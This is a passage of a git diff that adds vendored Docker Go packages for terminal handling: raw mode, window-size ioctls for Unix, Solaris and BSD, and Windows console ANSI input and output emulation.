file descriptor into +// raw mode and returns the previous state. On UNIX, this puts both the input +// and output into raw mode. On Windows, it only puts the input into raw mode. +func SetRawTerminal(fd uintptr) (*State, error) { + oldState, err := MakeRaw(fd) + if err != nil { + return nil, err + } + handleInterrupt(fd, oldState) + return oldState, err +} + +// SetRawTerminalOutput puts the output of terminal connected to the given file +// descriptor into raw mode. On UNIX, this does nothing and returns nil for the +// state. On Windows, it disables LF -> CRLF translation. 
+func SetRawTerminalOutput(fd uintptr) (*State, error) { + return nil, nil +} + +func handleInterrupt(fd uintptr, state *State) { + sigchan := make(chan os.Signal, 1) + signal.Notify(sigchan, os.Interrupt) + go func() { + for range sigchan { + // quit cleanly and the new terminal item is on a new line + fmt.Println() + signal.Stop(sigchan) + close(sigchan) + RestoreTerminal(fd, state) + os.Exit(1) + } + }() +} diff --git a/vendor/github.com/docker/docker/pkg/term/term_solaris.go b/vendor/github.com/docker/docker/pkg/term/term_solaris.go new file mode 100644 index 0000000000..112debbec5 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/term_solaris.go @@ -0,0 +1,41 @@ +// +build solaris + +package term + +import ( + "syscall" + "unsafe" +) + +/* +#include +#include +#include + +// Small wrapper to get rid of variadic args of ioctl() +int my_ioctl(int fd, int cmd, struct winsize *ws) { + return ioctl(fd, cmd, ws); +} +*/ +import "C" + +// GetWinsize returns the window size based on the specified file descriptor. +func GetWinsize(fd uintptr) (*Winsize, error) { + ws := &Winsize{} + ret, err := C.my_ioctl(C.int(fd), C.int(syscall.TIOCGWINSZ), (*C.struct_winsize)(unsafe.Pointer(ws))) + // Skip retval = 0 + if ret == 0 { + return ws, nil + } + return ws, err +} + +// SetWinsize tries to set the specified window size for the specified file descriptor. 
+func SetWinsize(fd uintptr, ws *Winsize) error { + ret, err := C.my_ioctl(C.int(fd), C.int(syscall.TIOCSWINSZ), (*C.struct_winsize)(unsafe.Pointer(ws))) + // Skip retval = 0 + if ret == 0 { + return nil + } + return err +} diff --git a/vendor/github.com/docker/docker/pkg/term/term_unix.go b/vendor/github.com/docker/docker/pkg/term/term_unix.go new file mode 100644 index 0000000000..ddf87a0e58 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/term_unix.go @@ -0,0 +1,29 @@ +// +build !solaris,!windows + +package term + +import ( + "syscall" + "unsafe" +) + +// GetWinsize returns the window size based on the specified file descriptor. +func GetWinsize(fd uintptr) (*Winsize, error) { + ws := &Winsize{} + _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(syscall.TIOCGWINSZ), uintptr(unsafe.Pointer(ws))) + // Skipp errno = 0 + if err == 0 { + return ws, nil + } + return ws, err +} + +// SetWinsize tries to set the specified window size for the specified file descriptor. +func SetWinsize(fd uintptr, ws *Winsize) error { + _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(syscall.TIOCSWINSZ), uintptr(unsafe.Pointer(ws))) + // Skipp errno = 0 + if err == 0 { + return nil + } + return err +} diff --git a/vendor/github.com/docker/docker/pkg/term/term_windows.go b/vendor/github.com/docker/docker/pkg/term/term_windows.go new file mode 100644 index 0000000000..a91f07e482 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/term_windows.go @@ -0,0 +1,233 @@ +// +build windows + +package term + +import ( + "io" + "os" + "os/signal" + "syscall" + + "github.com/Azure/go-ansiterm/winterm" + "github.com/docker/docker/pkg/term/windows" +) + +// State holds the console mode for the terminal. +type State struct { + mode uint32 +} + +// Winsize is used for window size. 
+type Winsize struct { + Height uint16 + Width uint16 +} + +const ( + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms683167(v=vs.85).aspx + enableVirtualTerminalInput = 0x0200 + enableVirtualTerminalProcessing = 0x0004 + disableNewlineAutoReturn = 0x0008 +) + +// vtInputSupported is true if enableVirtualTerminalInput is supported by the console +var vtInputSupported bool + +// StdStreams returns the standard streams (stdin, stdout, stedrr). +func StdStreams() (stdIn io.ReadCloser, stdOut, stdErr io.Writer) { + // Turn on VT handling on all std handles, if possible. This might + // fail, in which case we will fall back to terminal emulation. + var emulateStdin, emulateStdout, emulateStderr bool + fd := os.Stdin.Fd() + if mode, err := winterm.GetConsoleMode(fd); err == nil { + // Validate that enableVirtualTerminalInput is supported, but do not set it. + if err = winterm.SetConsoleMode(fd, mode|enableVirtualTerminalInput); err != nil { + emulateStdin = true + } else { + vtInputSupported = true + } + // Unconditionally set the console mode back even on failure because SetConsoleMode + // remembers invalid bits on input handles. + winterm.SetConsoleMode(fd, mode) + } + + fd = os.Stdout.Fd() + if mode, err := winterm.GetConsoleMode(fd); err == nil { + // Validate disableNewlineAutoReturn is supported, but do not set it. + if err = winterm.SetConsoleMode(fd, mode|enableVirtualTerminalProcessing|disableNewlineAutoReturn); err != nil { + emulateStdout = true + } else { + winterm.SetConsoleMode(fd, mode|enableVirtualTerminalProcessing) + } + } + + fd = os.Stderr.Fd() + if mode, err := winterm.GetConsoleMode(fd); err == nil { + // Validate disableNewlineAutoReturn is supported, but do not set it. 
+ if err = winterm.SetConsoleMode(fd, mode|enableVirtualTerminalProcessing|disableNewlineAutoReturn); err != nil { + emulateStderr = true + } else { + winterm.SetConsoleMode(fd, mode|enableVirtualTerminalProcessing) + } + } + + if os.Getenv("ConEmuANSI") == "ON" || os.Getenv("ConsoleZVersion") != "" { + // The ConEmu and ConsoleZ terminals emulate ANSI on output streams well. + emulateStdin = true + emulateStdout = false + emulateStderr = false + } + + if emulateStdin { + stdIn = windows.NewAnsiReader(syscall.STD_INPUT_HANDLE) + } else { + stdIn = os.Stdin + } + + if emulateStdout { + stdOut = windows.NewAnsiWriter(syscall.STD_OUTPUT_HANDLE) + } else { + stdOut = os.Stdout + } + + if emulateStderr { + stdErr = windows.NewAnsiWriter(syscall.STD_ERROR_HANDLE) + } else { + stdErr = os.Stderr + } + + return +} + +// GetFdInfo returns the file descriptor for an os.File and indicates whether the file represents a terminal. +func GetFdInfo(in interface{}) (uintptr, bool) { + return windows.GetHandleInfo(in) +} + +// GetWinsize returns the window size based on the specified file descriptor. +func GetWinsize(fd uintptr) (*Winsize, error) { + info, err := winterm.GetConsoleScreenBufferInfo(fd) + if err != nil { + return nil, err + } + + winsize := &Winsize{ + Width: uint16(info.Window.Right - info.Window.Left + 1), + Height: uint16(info.Window.Bottom - info.Window.Top + 1), + } + + return winsize, nil +} + +// IsTerminal returns true if the given file descriptor is a terminal. +func IsTerminal(fd uintptr) bool { + return windows.IsConsole(fd) +} + +// RestoreTerminal restores the terminal connected to the given file descriptor +// to a previous state. +func RestoreTerminal(fd uintptr, state *State) error { + return winterm.SetConsoleMode(fd, state.mode) +} + +// SaveState saves the state of the terminal connected to the given file descriptor. 
+func SaveState(fd uintptr) (*State, error) { + mode, e := winterm.GetConsoleMode(fd) + if e != nil { + return nil, e + } + + return &State{mode: mode}, nil +} + +// DisableEcho disables echo for the terminal connected to the given file descriptor. +// -- See https://msdn.microsoft.com/en-us/library/windows/desktop/ms683462(v=vs.85).aspx +func DisableEcho(fd uintptr, state *State) error { + mode := state.mode + mode &^= winterm.ENABLE_ECHO_INPUT + mode |= winterm.ENABLE_PROCESSED_INPUT | winterm.ENABLE_LINE_INPUT + err := winterm.SetConsoleMode(fd, mode) + if err != nil { + return err + } + + // Register an interrupt handler to catch and restore prior state + restoreAtInterrupt(fd, state) + return nil +} + +// SetRawTerminal puts the terminal connected to the given file descriptor into +// raw mode and returns the previous state. On UNIX, this puts both the input +// and output into raw mode. On Windows, it only puts the input into raw mode. +func SetRawTerminal(fd uintptr) (*State, error) { + state, err := MakeRaw(fd) + if err != nil { + return nil, err + } + + // Register an interrupt handler to catch and restore prior state + restoreAtInterrupt(fd, state) + return state, err +} + +// SetRawTerminalOutput puts the output of terminal connected to the given file +// descriptor into raw mode. On UNIX, this does nothing and returns nil for the +// state. On Windows, it disables LF -> CRLF translation. +func SetRawTerminalOutput(fd uintptr) (*State, error) { + state, err := SaveState(fd) + if err != nil { + return nil, err + } + + // Ignore failures, since disableNewlineAutoReturn might not be supported on this + // version of Windows. + winterm.SetConsoleMode(fd, state.mode|disableNewlineAutoReturn) + return state, err +} + +// MakeRaw puts the terminal (Windows Console) connected to the given file descriptor into raw +// mode and returns the previous state of the terminal so that it can be restored. 
+func MakeRaw(fd uintptr) (*State, error) { + state, err := SaveState(fd) + if err != nil { + return nil, err + } + + mode := state.mode + + // See + // -- https://msdn.microsoft.com/en-us/library/windows/desktop/ms686033(v=vs.85).aspx + // -- https://msdn.microsoft.com/en-us/library/windows/desktop/ms683462(v=vs.85).aspx + + // Disable these modes + mode &^= winterm.ENABLE_ECHO_INPUT + mode &^= winterm.ENABLE_LINE_INPUT + mode &^= winterm.ENABLE_MOUSE_INPUT + mode &^= winterm.ENABLE_WINDOW_INPUT + mode &^= winterm.ENABLE_PROCESSED_INPUT + + // Enable these modes + mode |= winterm.ENABLE_EXTENDED_FLAGS + mode |= winterm.ENABLE_INSERT_MODE + mode |= winterm.ENABLE_QUICK_EDIT_MODE + if vtInputSupported { + mode |= enableVirtualTerminalInput + } + + err = winterm.SetConsoleMode(fd, mode) + if err != nil { + return nil, err + } + return state, nil +} + +func restoreAtInterrupt(fd uintptr, state *State) { + sigchan := make(chan os.Signal, 1) + signal.Notify(sigchan, os.Interrupt) + + go func() { + _ = <-sigchan + RestoreTerminal(fd, state) + os.Exit(0) + }() +} diff --git a/vendor/github.com/docker/docker/pkg/term/termios_darwin.go b/vendor/github.com/docker/docker/pkg/term/termios_darwin.go new file mode 100644 index 0000000000..480db900ac --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/termios_darwin.go @@ -0,0 +1,69 @@ +package term + +import ( + "syscall" + "unsafe" +) + +const ( + getTermios = syscall.TIOCGETA + setTermios = syscall.TIOCSETA +) + +// Termios magic numbers, passthrough to the ones defined in syscall. 
+const ( + IGNBRK = syscall.IGNBRK + PARMRK = syscall.PARMRK + INLCR = syscall.INLCR + IGNCR = syscall.IGNCR + ECHONL = syscall.ECHONL + CSIZE = syscall.CSIZE + ICRNL = syscall.ICRNL + ISTRIP = syscall.ISTRIP + PARENB = syscall.PARENB + ECHO = syscall.ECHO + ICANON = syscall.ICANON + ISIG = syscall.ISIG + IXON = syscall.IXON + BRKINT = syscall.BRKINT + INPCK = syscall.INPCK + OPOST = syscall.OPOST + CS8 = syscall.CS8 + IEXTEN = syscall.IEXTEN +) + +// Termios is the Unix API for terminal I/O. +type Termios struct { + Iflag uint64 + Oflag uint64 + Cflag uint64 + Lflag uint64 + Cc [20]byte + Ispeed uint64 + Ospeed uint64 +} + +// MakeRaw put the terminal connected to the given file descriptor into raw +// mode and returns the previous state of the terminal so that it can be +// restored. +func MakeRaw(fd uintptr) (*State, error) { + var oldState State + if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(getTermios), uintptr(unsafe.Pointer(&oldState.termios))); err != 0 { + return nil, err + } + + newState := oldState.termios + newState.Iflag &^= (IGNBRK | BRKINT | PARMRK | ISTRIP | INLCR | IGNCR | ICRNL | IXON) + newState.Oflag &^= OPOST + newState.Lflag &^= (ECHO | ECHONL | ICANON | ISIG | IEXTEN) + newState.Cflag &^= (CSIZE | PARENB) + newState.Cflag |= CS8 + newState.Cc[syscall.VMIN] = 1 + newState.Cc[syscall.VTIME] = 0 + + if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(setTermios), uintptr(unsafe.Pointer(&newState))); err != 0 { + return nil, err + } + + return &oldState, nil +} diff --git a/vendor/github.com/docker/docker/pkg/term/termios_freebsd.go b/vendor/github.com/docker/docker/pkg/term/termios_freebsd.go new file mode 100644 index 0000000000..ed843ad69c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/termios_freebsd.go @@ -0,0 +1,69 @@ +package term + +import ( + "syscall" + "unsafe" +) + +const ( + getTermios = syscall.TIOCGETA + setTermios = syscall.TIOCSETA +) + +// Termios magic numbers, passthrough to the ones 
defined in syscall. +const ( + IGNBRK = syscall.IGNBRK + PARMRK = syscall.PARMRK + INLCR = syscall.INLCR + IGNCR = syscall.IGNCR + ECHONL = syscall.ECHONL + CSIZE = syscall.CSIZE + ICRNL = syscall.ICRNL + ISTRIP = syscall.ISTRIP + PARENB = syscall.PARENB + ECHO = syscall.ECHO + ICANON = syscall.ICANON + ISIG = syscall.ISIG + IXON = syscall.IXON + BRKINT = syscall.BRKINT + INPCK = syscall.INPCK + OPOST = syscall.OPOST + CS8 = syscall.CS8 + IEXTEN = syscall.IEXTEN +) + +// Termios is the Unix API for terminal I/O. +type Termios struct { + Iflag uint32 + Oflag uint32 + Cflag uint32 + Lflag uint32 + Cc [20]byte + Ispeed uint32 + Ospeed uint32 +} + +// MakeRaw put the terminal connected to the given file descriptor into raw +// mode and returns the previous state of the terminal so that it can be +// restored. +func MakeRaw(fd uintptr) (*State, error) { + var oldState State + if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(getTermios), uintptr(unsafe.Pointer(&oldState.termios))); err != 0 { + return nil, err + } + + newState := oldState.termios + newState.Iflag &^= (IGNBRK | BRKINT | PARMRK | ISTRIP | INLCR | IGNCR | ICRNL | IXON) + newState.Oflag &^= OPOST + newState.Lflag &^= (ECHO | ECHONL | ICANON | ISIG | IEXTEN) + newState.Cflag &^= (CSIZE | PARENB) + newState.Cflag |= CS8 + newState.Cc[syscall.VMIN] = 1 + newState.Cc[syscall.VTIME] = 0 + + if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(setTermios), uintptr(unsafe.Pointer(&newState))); err != 0 { + return nil, err + } + + return &oldState, nil +} diff --git a/vendor/github.com/docker/docker/pkg/term/termios_linux.go b/vendor/github.com/docker/docker/pkg/term/termios_linux.go new file mode 100644 index 0000000000..22921b6aef --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/termios_linux.go @@ -0,0 +1,47 @@ +// +build !cgo + +package term + +import ( + "syscall" + "unsafe" +) + +const ( + getTermios = syscall.TCGETS + setTermios = syscall.TCSETS +) + +// Termios is the Unix 
API for terminal I/O. +type Termios struct { + Iflag uint32 + Oflag uint32 + Cflag uint32 + Lflag uint32 + Cc [20]byte + Ispeed uint32 + Ospeed uint32 +} + +// MakeRaw put the terminal connected to the given file descriptor into raw +// mode and returns the previous state of the terminal so that it can be +// restored. +func MakeRaw(fd uintptr) (*State, error) { + var oldState State + if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, getTermios, uintptr(unsafe.Pointer(&oldState.termios))); err != 0 { + return nil, err + } + + newState := oldState.termios + + newState.Iflag &^= (syscall.IGNBRK | syscall.BRKINT | syscall.PARMRK | syscall.ISTRIP | syscall.INLCR | syscall.IGNCR | syscall.ICRNL | syscall.IXON) + newState.Oflag &^= syscall.OPOST + newState.Lflag &^= (syscall.ECHO | syscall.ECHONL | syscall.ICANON | syscall.ISIG | syscall.IEXTEN) + newState.Cflag &^= (syscall.CSIZE | syscall.PARENB) + newState.Cflag |= syscall.CS8 + + if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, setTermios, uintptr(unsafe.Pointer(&newState))); err != 0 { + return nil, err + } + return &oldState, nil +} diff --git a/vendor/github.com/docker/docker/pkg/term/termios_openbsd.go b/vendor/github.com/docker/docker/pkg/term/termios_openbsd.go new file mode 100644 index 0000000000..ed843ad69c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/termios_openbsd.go @@ -0,0 +1,69 @@ +package term + +import ( + "syscall" + "unsafe" +) + +const ( + getTermios = syscall.TIOCGETA + setTermios = syscall.TIOCSETA +) + +// Termios magic numbers, passthrough to the ones defined in syscall. 
+const ( + IGNBRK = syscall.IGNBRK + PARMRK = syscall.PARMRK + INLCR = syscall.INLCR + IGNCR = syscall.IGNCR + ECHONL = syscall.ECHONL + CSIZE = syscall.CSIZE + ICRNL = syscall.ICRNL + ISTRIP = syscall.ISTRIP + PARENB = syscall.PARENB + ECHO = syscall.ECHO + ICANON = syscall.ICANON + ISIG = syscall.ISIG + IXON = syscall.IXON + BRKINT = syscall.BRKINT + INPCK = syscall.INPCK + OPOST = syscall.OPOST + CS8 = syscall.CS8 + IEXTEN = syscall.IEXTEN +) + +// Termios is the Unix API for terminal I/O. +type Termios struct { + Iflag uint32 + Oflag uint32 + Cflag uint32 + Lflag uint32 + Cc [20]byte + Ispeed uint32 + Ospeed uint32 +} + +// MakeRaw put the terminal connected to the given file descriptor into raw +// mode and returns the previous state of the terminal so that it can be +// restored. +func MakeRaw(fd uintptr) (*State, error) { + var oldState State + if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(getTermios), uintptr(unsafe.Pointer(&oldState.termios))); err != 0 { + return nil, err + } + + newState := oldState.termios + newState.Iflag &^= (IGNBRK | BRKINT | PARMRK | ISTRIP | INLCR | IGNCR | ICRNL | IXON) + newState.Oflag &^= OPOST + newState.Lflag &^= (ECHO | ECHONL | ICANON | ISIG | IEXTEN) + newState.Cflag &^= (CSIZE | PARENB) + newState.Cflag |= CS8 + newState.Cc[syscall.VMIN] = 1 + newState.Cc[syscall.VTIME] = 0 + + if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(setTermios), uintptr(unsafe.Pointer(&newState))); err != 0 { + return nil, err + } + + return &oldState, nil +} diff --git a/vendor/github.com/docker/docker/pkg/term/windows/ansi_reader.go b/vendor/github.com/docker/docker/pkg/term/windows/ansi_reader.go new file mode 100644 index 0000000000..cb0b88356d --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/windows/ansi_reader.go @@ -0,0 +1,263 @@ +// +build windows + +package windows + +import ( + "bytes" + "errors" + "fmt" + "io" + "os" + "strings" + "unsafe" + + ansiterm "github.com/Azure/go-ansiterm" + 
"github.com/Azure/go-ansiterm/winterm" +) + +const ( + escapeSequence = ansiterm.KEY_ESC_CSI +) + +// ansiReader wraps a standard input file (e.g., os.Stdin) providing ANSI sequence translation. +type ansiReader struct { + file *os.File + fd uintptr + buffer []byte + cbBuffer int + command []byte +} + +// NewAnsiReader returns an io.ReadCloser that provides VT100 terminal emulation on top of a +// Windows console input handle. +func NewAnsiReader(nFile int) io.ReadCloser { + initLogger() + file, fd := winterm.GetStdFile(nFile) + return &ansiReader{ + file: file, + fd: fd, + command: make([]byte, 0, ansiterm.ANSI_MAX_CMD_LENGTH), + buffer: make([]byte, 0), + } +} + +// Close closes the wrapped file. +func (ar *ansiReader) Close() (err error) { + return ar.file.Close() +} + +// Fd returns the file descriptor of the wrapped file. +func (ar *ansiReader) Fd() uintptr { + return ar.fd +} + +// Read reads up to len(p) bytes of translated input events into p. +func (ar *ansiReader) Read(p []byte) (int, error) { + if len(p) == 0 { + return 0, nil + } + + // Previously read bytes exist, read as much as we can and return + if len(ar.buffer) > 0 { + logger.Debugf("Reading previously cached bytes") + + originalLength := len(ar.buffer) + copiedLength := copy(p, ar.buffer) + + if copiedLength == originalLength { + ar.buffer = make([]byte, 0, len(p)) + } else { + ar.buffer = ar.buffer[copiedLength:] + } + + logger.Debugf("Read from cache p[%d]: % x", copiedLength, p) + return copiedLength, nil + } + + // Read and translate key events + events, err := readInputEvents(ar.fd, len(p)) + if err != nil { + return 0, err + } else if len(events) == 0 { + logger.Debug("No input events detected") + return 0, nil + } + + keyBytes := translateKeyEvents(events, []byte(escapeSequence)) + + // Save excess bytes and right-size keyBytes + if len(keyBytes) > len(p) { + logger.Debugf("Received %d keyBytes, only room for %d bytes", len(keyBytes), len(p)) + ar.buffer = keyBytes[len(p):] + keyBytes = 
keyBytes[:len(p)] + } else if len(keyBytes) == 0 { + logger.Debug("No key bytes returned from the translator") + return 0, nil + } + + copiedLength := copy(p, keyBytes) + if copiedLength != len(keyBytes) { + return 0, errors.New("unexpected copy length encountered") + } + + logger.Debugf("Read p[%d]: % x", copiedLength, p) + logger.Debugf("Read keyBytes[%d]: % x", copiedLength, keyBytes) + return copiedLength, nil +} + +// readInputEvents polls until at least one event is available. +func readInputEvents(fd uintptr, maxBytes int) ([]winterm.INPUT_RECORD, error) { + // Determine the maximum number of records to retrieve + // -- Cast around the type system to obtain the size of a single INPUT_RECORD. + // unsafe.Sizeof requires an expression vs. a type-reference; the casting + // tricks the type system into believing it has such an expression. + recordSize := int(unsafe.Sizeof(*((*winterm.INPUT_RECORD)(unsafe.Pointer(&maxBytes))))) + countRecords := maxBytes / recordSize + if countRecords > ansiterm.MAX_INPUT_EVENTS { + countRecords = ansiterm.MAX_INPUT_EVENTS + } else if countRecords == 0 { + countRecords = 1 + } + logger.Debugf("[windows] readInputEvents: Reading %v records (buffer size %v, record size %v)", countRecords, maxBytes, recordSize) + + // Wait for and read input events + events := make([]winterm.INPUT_RECORD, countRecords) + nEvents := uint32(0) + eventsExist, err := winterm.WaitForSingleObject(fd, winterm.WAIT_INFINITE) + if err != nil { + return nil, err + } + + if eventsExist { + err = winterm.ReadConsoleInput(fd, events, &nEvents) + if err != nil { + return nil, err + } + } + + // Return a slice restricted to the number of returned records + logger.Debugf("[windows] readInputEvents: Read %v events", nEvents) + return events[:nEvents], nil +} + +// KeyEvent Translation Helpers + +var arrowKeyMapPrefix = map[uint16]string{ + winterm.VK_UP: "%s%sA", + winterm.VK_DOWN: "%s%sB", + winterm.VK_RIGHT: "%s%sC", + winterm.VK_LEFT: "%s%sD", +} + +var 
keyMapPrefix = map[uint16]string{ + winterm.VK_UP: "\x1B[%sA", + winterm.VK_DOWN: "\x1B[%sB", + winterm.VK_RIGHT: "\x1B[%sC", + winterm.VK_LEFT: "\x1B[%sD", + winterm.VK_HOME: "\x1B[1%s~", // showkey shows ^[[1 + winterm.VK_END: "\x1B[4%s~", // showkey shows ^[[4 + winterm.VK_INSERT: "\x1B[2%s~", + winterm.VK_DELETE: "\x1B[3%s~", + winterm.VK_PRIOR: "\x1B[5%s~", + winterm.VK_NEXT: "\x1B[6%s~", + winterm.VK_F1: "", + winterm.VK_F2: "", + winterm.VK_F3: "\x1B[13%s~", + winterm.VK_F4: "\x1B[14%s~", + winterm.VK_F5: "\x1B[15%s~", + winterm.VK_F6: "\x1B[17%s~", + winterm.VK_F7: "\x1B[18%s~", + winterm.VK_F8: "\x1B[19%s~", + winterm.VK_F9: "\x1B[20%s~", + winterm.VK_F10: "\x1B[21%s~", + winterm.VK_F11: "\x1B[23%s~", + winterm.VK_F12: "\x1B[24%s~", +} + +// translateKeyEvents converts the input events into the appropriate ANSI string. +func translateKeyEvents(events []winterm.INPUT_RECORD, escapeSequence []byte) []byte { + var buffer bytes.Buffer + for _, event := range events { + if event.EventType == winterm.KEY_EVENT && event.KeyEvent.KeyDown != 0 { + buffer.WriteString(keyToString(&event.KeyEvent, escapeSequence)) + } + } + + return buffer.Bytes() +} + +// keyToString maps the given input event record to the corresponding string. +func keyToString(keyEvent *winterm.KEY_EVENT_RECORD, escapeSequence []byte) string { + if keyEvent.UnicodeChar == 0 { + return formatVirtualKey(keyEvent.VirtualKeyCode, keyEvent.ControlKeyState, escapeSequence) + } + + _, alt, control := getControlKeys(keyEvent.ControlKeyState) + if control { + // TODO(azlinux): Implement following control sequences + // -D Signals the end of input from the keyboard; also exits current shell. + // -H Deletes the first character to the left of the cursor. Also called the ERASE key. + // -Q Restarts printing after it has been stopped with -s. + // -S Suspends printing on the screen (does not stop the program). + // -U Deletes all characters on the current line. Also called the KILL key. 
+ // -E Quits current command and creates a core + + } + + // +Key generates ESC N Key + if !control && alt { + return ansiterm.KEY_ESC_N + strings.ToLower(string(keyEvent.UnicodeChar)) + } + + return string(keyEvent.UnicodeChar) +} + +// formatVirtualKey converts a virtual key (e.g., up arrow) into the appropriate ANSI string. +func formatVirtualKey(key uint16, controlState uint32, escapeSequence []byte) string { + shift, alt, control := getControlKeys(controlState) + modifier := getControlKeysModifier(shift, alt, control) + + if format, ok := arrowKeyMapPrefix[key]; ok { + return fmt.Sprintf(format, escapeSequence, modifier) + } + + if format, ok := keyMapPrefix[key]; ok { + return fmt.Sprintf(format, modifier) + } + + return "" +} + +// getControlKeys extracts the shift, alt, and ctrl key states. +func getControlKeys(controlState uint32) (shift, alt, control bool) { + shift = 0 != (controlState & winterm.SHIFT_PRESSED) + alt = 0 != (controlState & (winterm.LEFT_ALT_PRESSED | winterm.RIGHT_ALT_PRESSED)) + control = 0 != (controlState & (winterm.LEFT_CTRL_PRESSED | winterm.RIGHT_CTRL_PRESSED)) + return shift, alt, control +} + +// getControlKeysModifier returns the ANSI modifier for the given combination of control keys. 
+func getControlKeysModifier(shift, alt, control bool) string { + if shift && alt && control { + return ansiterm.KEY_CONTROL_PARAM_8 + } + if alt && control { + return ansiterm.KEY_CONTROL_PARAM_7 + } + if shift && control { + return ansiterm.KEY_CONTROL_PARAM_6 + } + if control { + return ansiterm.KEY_CONTROL_PARAM_5 + } + if shift && alt { + return ansiterm.KEY_CONTROL_PARAM_4 + } + if alt { + return ansiterm.KEY_CONTROL_PARAM_3 + } + if shift { + return ansiterm.KEY_CONTROL_PARAM_2 + } + return "" +} diff --git a/vendor/github.com/docker/docker/pkg/term/windows/ansi_writer.go b/vendor/github.com/docker/docker/pkg/term/windows/ansi_writer.go new file mode 100644 index 0000000000..a3ce5697d9 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/windows/ansi_writer.go @@ -0,0 +1,64 @@ +// +build windows + +package windows + +import ( + "io" + "os" + + ansiterm "github.com/Azure/go-ansiterm" + "github.com/Azure/go-ansiterm/winterm" +) + +// ansiWriter wraps a standard output file (e.g., os.Stdout) providing ANSI sequence translation. +type ansiWriter struct { + file *os.File + fd uintptr + infoReset *winterm.CONSOLE_SCREEN_BUFFER_INFO + command []byte + escapeSequence []byte + inAnsiSequence bool + parser *ansiterm.AnsiParser +} + +// NewAnsiWriter returns an io.Writer that provides VT100 terminal emulation on top of a +// Windows console output handle. 
+func NewAnsiWriter(nFile int) io.Writer { + initLogger() + file, fd := winterm.GetStdFile(nFile) + info, err := winterm.GetConsoleScreenBufferInfo(fd) + if err != nil { + return nil + } + + parser := ansiterm.CreateParser("Ground", winterm.CreateWinEventHandler(fd, file)) + logger.Infof("newAnsiWriter: parser %p", parser) + + aw := &ansiWriter{ + file: file, + fd: fd, + infoReset: info, + command: make([]byte, 0, ansiterm.ANSI_MAX_CMD_LENGTH), + escapeSequence: []byte(ansiterm.KEY_ESC_CSI), + parser: parser, + } + + logger.Infof("newAnsiWriter: aw.parser %p", aw.parser) + logger.Infof("newAnsiWriter: %v", aw) + return aw +} + +func (aw *ansiWriter) Fd() uintptr { + return aw.fd +} + +// Write writes len(p) bytes from p to the underlying data stream. +func (aw *ansiWriter) Write(p []byte) (total int, err error) { + if len(p) == 0 { + return 0, nil + } + + logger.Infof("Write: % x", p) + logger.Infof("Write: %s", string(p)) + return aw.parser.Parse(p) +} diff --git a/vendor/github.com/docker/docker/pkg/term/windows/console.go b/vendor/github.com/docker/docker/pkg/term/windows/console.go new file mode 100644 index 0000000000..ca5c3b2e53 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/windows/console.go @@ -0,0 +1,35 @@ +// +build windows + +package windows + +import ( + "os" + + "github.com/Azure/go-ansiterm/winterm" +) + +// GetHandleInfo returns file descriptor and bool indicating whether the file is a console. +func GetHandleInfo(in interface{}) (uintptr, bool) { + switch t := in.(type) { + case *ansiReader: + return t.Fd(), true + case *ansiWriter: + return t.Fd(), true + } + + var inFd uintptr + var isTerminal bool + + if file, ok := in.(*os.File); ok { + inFd = file.Fd() + isTerminal = IsConsole(inFd) + } + return inFd, isTerminal +} + +// IsConsole returns true if the given file descriptor is a Windows Console. +// The code assumes that GetConsoleMode will return an error for file descriptors that are not a console. 
+func IsConsole(fd uintptr) bool { + _, e := winterm.GetConsoleMode(fd) + return e == nil +} diff --git a/vendor/github.com/docker/docker/pkg/term/windows/windows.go b/vendor/github.com/docker/docker/pkg/term/windows/windows.go new file mode 100644 index 0000000000..ce4cb5990e --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/windows/windows.go @@ -0,0 +1,33 @@ +// These files implement ANSI-aware input and output streams for use by the Docker Windows client. +// When asked for the set of standard streams (e.g., stdin, stdout, stderr), the code will create +// and return pseudo-streams that convert ANSI sequences to / from Windows Console API calls. + +package windows + +import ( + "io/ioutil" + "os" + "sync" + + ansiterm "github.com/Azure/go-ansiterm" + "github.com/Sirupsen/logrus" +) + +var logger *logrus.Logger +var initOnce sync.Once + +func initLogger() { + initOnce.Do(func() { + logFile := ioutil.Discard + + if isDebugEnv := os.Getenv(ansiterm.LogEnv); isDebugEnv == "1" { + logFile, _ = os.Create("ansiReaderWriter.log") + } + + logger = &logrus.Logger{ + Out: logFile, + Formatter: new(logrus.TextFormatter), + Level: logrus.DebugLevel, + } + }) +} diff --git a/vendor/github.com/docker/docker/pkg/term/windows/windows_test.go b/vendor/github.com/docker/docker/pkg/term/windows/windows_test.go new file mode 100644 index 0000000000..52aeab54ec --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/windows/windows_test.go @@ -0,0 +1,3 @@ +// This file is necessary to pass the Docker tests. 
